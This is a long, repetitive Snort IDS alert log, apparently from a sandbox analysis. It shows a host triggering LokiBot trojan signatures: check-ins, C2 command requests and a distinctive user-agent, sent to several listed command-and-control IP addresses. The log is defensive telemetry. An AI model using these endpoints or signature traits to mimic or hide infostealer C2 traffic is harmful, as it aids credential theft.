Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49193 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49193 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49193 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49194 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49194 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49194 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49194 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49194 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49195 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49195 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49195 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49195 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49195 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49196 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49196 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49196 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49196 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49196 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49197 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49197 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49197 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49197 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49197 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49198 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49198 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49198 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49198 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49198 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49199 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49199 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49199 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49199 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49199 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49200 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49200 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49200 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49200 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49200 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49201 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49201 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49201 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49201 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49201 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49202 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49202 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49202 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49202 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49202 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49203 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49203 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49203 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49203 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49203 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49204 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49204 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49204 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49204 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49204 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49205 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49205 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49205 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49205 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49205 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49206 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49206 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49206 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49206 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49206 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49207 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49207 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49207 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49207 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49207 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49208 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49208 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49208 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49208 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49208 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49209 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49209 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49209 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49209 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49209 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49210 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49210 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49210 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49210 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49210 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49211 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49211 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49211 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49211 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49211 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49212 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49212 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49212 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49212 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49212 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49213 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49213 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49213 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49213 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49213 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49214 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49214 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49214 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49214 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49214 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49215 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49215 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49215 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49215 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49215 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49216 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49216 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49216 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49216 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49216 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49217 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49217 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49217 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49217 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49217 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49218 -> 188.114.97.9:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49218 -> 188.114.97.9:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49218 -> 188.114.97.9:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49218 -> 188.114.97.9:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49218 -> 188.114.97.9:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49219 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49219 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49219 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49219 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49219 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49220 -> 188.114.97.9:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49220 -> 188.114.97.9:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49220 -> 188.114.97.9:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49220 -> 188.114.97.9:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49220 -> 188.114.97.9:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49221 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49221 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49221 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49221 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49221 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49222 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49222 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49222 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49222 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49222 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49223 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49223 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49223 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49223 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49223 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49224 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49224 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49224 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49224 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49224 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49225 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49225 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49225 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49225 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49225 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49226 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49226 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49226 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49226 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49226 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49227 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49227 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49227 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49227 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49227 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49228 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49228 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49228 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49228 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49228 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49229 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49229 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49229 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49229 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49229 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49230 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49230 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49230 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49230 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49230 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49231 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49231 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49231 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49231 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49231 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49232 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49232 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49232 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49232 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49232 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49233 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49233 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49233 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49233 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49233 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49234 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49234 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49234 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49234 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49234 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49235 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49235 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49235 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49235 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49235 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49236 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49236 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49236 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49236 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49236 -> 188.114.96.9:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49237 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49237 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49237 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49237 -> 188.114.97.3:80
Source: Traffic Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49237 -> 188.114.97.3:80
